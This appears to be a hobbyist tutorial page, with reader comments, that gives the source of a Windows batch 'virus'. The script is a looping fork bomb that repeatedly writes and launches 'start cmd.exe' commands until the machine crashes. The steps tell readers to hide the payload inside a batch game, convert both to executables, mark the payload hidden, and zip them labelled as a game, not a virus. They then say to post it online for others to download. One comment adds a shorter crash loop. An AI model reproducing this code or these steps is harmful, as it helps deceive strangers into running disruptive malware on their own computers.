Hidden Virus & Game!

Introduction: Hidden Virus & Game!

About: I am a dude who has a job, I am also Christian

This is a batch game, with a virus at the end. The virus will only crash the computer, it should not do anything else.

::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::

I REPEAT, THIS DOES HAVE A VIRUS AT THE END, I AM NOT RESPONSIBLE FOR DAMAGE TO YOUR COMPUTER. DO NOT USE THIS FOR ILLEGAL PURPOSES!

::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::

Step 1: Copyrights

I used the dragon game by CodeSmartz, the link is here:

https://www.instructables.com/id/Batch-File-Dragon-...

The materials you need are:

* A computer

* Time

* a batch to exe converter:

http://www.battoexeconverter.com/#downloadbattoexe

* Knowledge of how to navigate a computer

Step 2: Virus Code

The code is between the #'s

#################################################################

@echo off

set #UA#=@@

cd "C:\"

mkdir "C:\Programs"

attrib "C:\Programs" +H

:1

if %#UA#% == @@ (

echo start cmd.exe
echo start cmd.exe

echo start cmd.exe
echo start cmd.exe

echo start cmd.exe
echo start cmd.exe

echo start cmd.exe
echo start cmd.exe

echo start cmd.exe
echo start cmd.exe

echo start cmd.exe
echo start cmd.exe

echo start cmd.exe
echo start cmd.exe

echo start cmd.exe
echo start cmd.exe

echo start cmd.exe
echo start cmd.exe

echo start cmd.exe
echo start cmd.exe

echo start cmd.exe
echo start cmd.exe

echo start cmd.exe
echo start cmd.exe

echo start cmd.exe
echo start cmd.exe

echo start cmd.exe
echo start cmd.exe

echo start cmd.exe
echo start cmd.exe

echo start cmd.exe
echo start cmd.exe

echo start cmd.exe
echo start cmd.exe

echo start cmd.exe
echo start cmd.exe

echo start cmd.exe
echo start cmd.exe

echo start cmd.exe
echo start cmd.exe

echo start cmd.exe
echo start cmd.exe

echo start cmd.exe
echo start cmd.exe

echo start cmd.exe
echo start cmd.exe

echo start cmd.exe
echo start cmd.exe

echo start cmd.exe
echo start cmd.exe

echo start cmd.exe
echo start cmd.exe

echo start cmd.exe
echo start cmd.exe

echo start cmd.exe
echo start cmd.exe

echo start cmd.exe
echo start cmd.exe

echo start cmd.exe
echo start cmd.exe

echo start cmd.exe
echo start cmd.exe

echo start cmd.exe
echo start cmd.exe

echo start cmd.exe
echo start cmd.exe

echo start cmd.exe
echo start cmd.exe

echo start cmd.exe
echo start cmd.exe

echo start cmd.exe
echo start cmd.exe)>>yeast.cmd

cls

start yeast.cmd

goto :1

###############################################

save this as STATS.cmd

At the very end of the Dragon game before the (goto :start) type:
START STATS.exe

then use the bat to exe converter to convert both files (the game and the virus) to an exe.

Then on stats: right click>properties>general tab>check Hidden>click OK

Then put both files into a zipped file then name it whatever you want, as long as it says it is a game, not a virus.

Step 3: Pranking! ;-D

Put it on the internet (like I did) and let every body download and get pranked!

Here is the copy I did:

Be the First to Share

    Recommendations

    • Big and Small Contest

      Big and Small Contest
    • Game Design: Student Design Challenge

      Game Design: Student Design Challenge
    • Make It Bridge

      Make It Bridge

    4 Comments

    0
    NotePro
    NotePro

    1 year ago

    Ether someone coppyed off of you or you coppied off of someone else because I have seen an instructable on "Batch Dragon Game" and it doesn't seem that there is any credit given in this instructable.

    0
    pingasj
    pingasj

    5 years ago

    this is just a glorified loop i feel, like it could have been done like this in much less time:

    :a

    start

    goto a

    0
    wilderness tech
    wilderness tech

    6 years ago

    oh... crap, I just realized that STATS doesn't work, do not use the batch to exe program on it, then fiddle around with the code until it works how you want it to.

    Thanks, Wilderness Tech

    0
    tomatoskins
    tomatoskins

    6 years ago

    So cool! I love fun programs like this.